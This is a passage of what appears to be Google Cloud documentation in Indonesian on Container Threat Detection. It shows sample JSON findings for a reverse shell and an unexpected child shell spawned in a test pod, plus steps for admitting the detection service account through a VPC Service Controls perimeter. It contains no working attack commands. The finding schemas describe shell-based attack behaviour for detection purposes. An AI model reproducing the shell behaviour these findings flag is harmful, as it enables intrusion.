      "Parent_Pid": 1.0,
      "Process_Creation_Timestamp": {
        "seconds": 1.61798989E9,
        "nanos": 6.16573691E8
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:38:10.904Z",
    "createTime": "2021-04-09T17:38:15.486Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Ip": {
        "primitiveDataType": "STRING"
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Reverse_Shell_Stdin_Redirection_Src_Ip": {
        "primitiveDataType": "STRING"
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Reverse_Shell_Stdin_Redirection_Dst_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Reverse_Shell_Stdin_Redirection_Src_Port": {
        "primitiveDataType": "NUMBER"
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Shell Turunan yang Tidak Terduga

{
  "finding": {
    "access": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
    "category": "Unexpected Child Shell",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-06-29T17:34:13.765Z",
    "database": {},
    "description": "A process should not normally create child shell processes, spawn a child shell process.",
    "eventTime": "2023-06-29T17:34:13.492Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "ns": "default",
          "name": "CONTAINER_NAME",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_URI",
              "imageId": CONTAINER_IMAGE_ID"
            }
          ]
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER"
      ]
    },
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/dash\"",
          "size": "31376",
          "sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
          "hashedSize": "31376",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/dash\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"PYTHONUNBUFFERED\"",
            "val": "\"1\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/home/vmagent/app\""
          },
          {
            "name": "\"LANG\"",
            "val": "\"C.UTF-8\""
          },
          {
            "name": "\"SHLVL\"",
            "val": "\"1\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"PORT\"",
            "val": "\"8080\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.52.113.1\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.52.113.1:443\""
          },
          {
            "name": "\"_\"",
            "val": "\"./temp/dash\""
          }
        ],
        "pid": "15",
        "parentPid": "14"
      },
      {
        "binary": {
          "path": "\"/home/vmagent/app/temp/consul\"",
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"./temp/consul\""
        ],
        "argumentsTruncated": false,
        "pid": "14",
        "parentPid": "13"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "Process_Arguments": [
      "./temp/dash"
    ],
    "Pid": 15,
    "Process_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 207040864
    },
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
    "VM_Instance_Name": "INSTANCE_ID",
    "Pod_Name": "POD_NAME",
    "Pod_Namespace": "default",
    "Container_Name": "CONTAINER_NAME",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Container_Creation_Timestamp": {
      "seconds": 1688060050,
      "nanos": 0
    },
    "Parent_Pid": 14,
    "Environment_Variables": [
      "HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",
      "KUBERNETES_PORT_443_TCP_PORT=443",
      "KUBERNETES_PORT=tcp://10.52.113.1:443",
      "PYTHONUNBUFFERED=1",
      "KUBERNETES_SERVICE_PORT=443",
      "KUBERNETES_SERVICE_HOST=10.52.113.1",
      "PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "PWD=/home/vmagent/app",
      "LANG=C.UTF-8",
      "SHLVL=1",
      "HOME=/root",
      "KUBERNETES_PORT_443_TCP_PROTO=tcp",
      "KUBERNETES_SERVICE_PORT_HTTPS=443",
      "DEBIAN_FRONTEND=noninteractive",
      "PORT=8080",
      "KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",
      "KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",
      "_=./temp/dash"
    ]
  }
}
    

Memindai project yang dilindungi oleh perimeter layanan

Jika Anda mengaktifkan Security Command Center di tingkat organisasi setelah 7 Desember 2023 dan memiliki perimeter layanan yang memblokir akses ke project dan layanan tertentu, Anda harus memberikan akses masuk ke akun layanan untuk Deteksi Ancaman Penampung ke perimeter layanan tersebut. Jika tidak, Container Threat Detection tidak dapat menghasilkan temuan yang terkait dengan project dan layanan yang dilindungi.

Untuk aktivasi tingkat organisasi, ID akun layanan adalah alamat email dalam format berikut:

service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com

Pada contoh sebelumnya, ganti ORGANIZATION_ID dengan ID numerik organisasi Anda.

Jika cluster Anda berada dalam perimeter layanan Kontrol Layanan VPC, pastikan containerthreatdetection.googleapis.com, Container Threat Detection API, tercantum sebagai layanan yang dapat diakses. Untuk mengetahui informasi selengkapnya, lihat Ringkasan perimeter layanan.

Untuk memberikan akses masuk akun layanan ke perimeter layanan, ikuti langkah-langkah berikut.

  1. Buka Kontrol Layanan VPC.

    Buka Kontrol Layanan VPC

  2. Di toolbar, pilih organisasi Google Cloud Anda.

    Pemilih project

  3. Dalam menu drop-down, pilih kebijakan akses yang berisi perimeter layanan yang ingin Anda berikan aksesnya.

    Daftar kebijakan akses

    Perimeter layanan yang terkait dengan kebijakan akses akan muncul dalam daftar.

  4. Klik nama perimeter layanan.

  5. Klik Edit perimeter

  6. Di menu navigasi, klik Ingress Policy.

  7. Klik Tambahkan Aturan.

  8. Konfigurasikan aturan sebagai berikut:

    Atribut FROM klien API

    1. Untuk Sumber, pilih Semua sumber.
    2. Untuk Identity, pilih Selected identities.
    3. Di kolom Tambahkan Akun Pengguna/Akun Layanan, klik Pilih.
    4. Masukkan alamat email akun layanan. Jika Anda memiliki akun layanan tingkat organisasi dan tingkat project, tambahkan keduanya.
    5. Klik Simpan.

    Atribut TO layanan/resource GCP

    1. Untuk Project, pilih All projects.

    2. Untuk Layanan, pilih Semua layanan atau pilih setiap layanan individual berikut yang diperlukan Container Threat Detection:

      • Kubernetes Engine API

      Jika perimeter layanan membatasi akses ke layanan yang diperlukan, Container Threat Detection tidak dapat menghasilkan temuan untuk layanan tersebut.

    3. Di menu navigasi, klik Simpan.

    Untuk informasi selengkapnya, lihat Mengonfigurasi kebijakan traffic masuk dan keluar.

    Langkah selanjutnya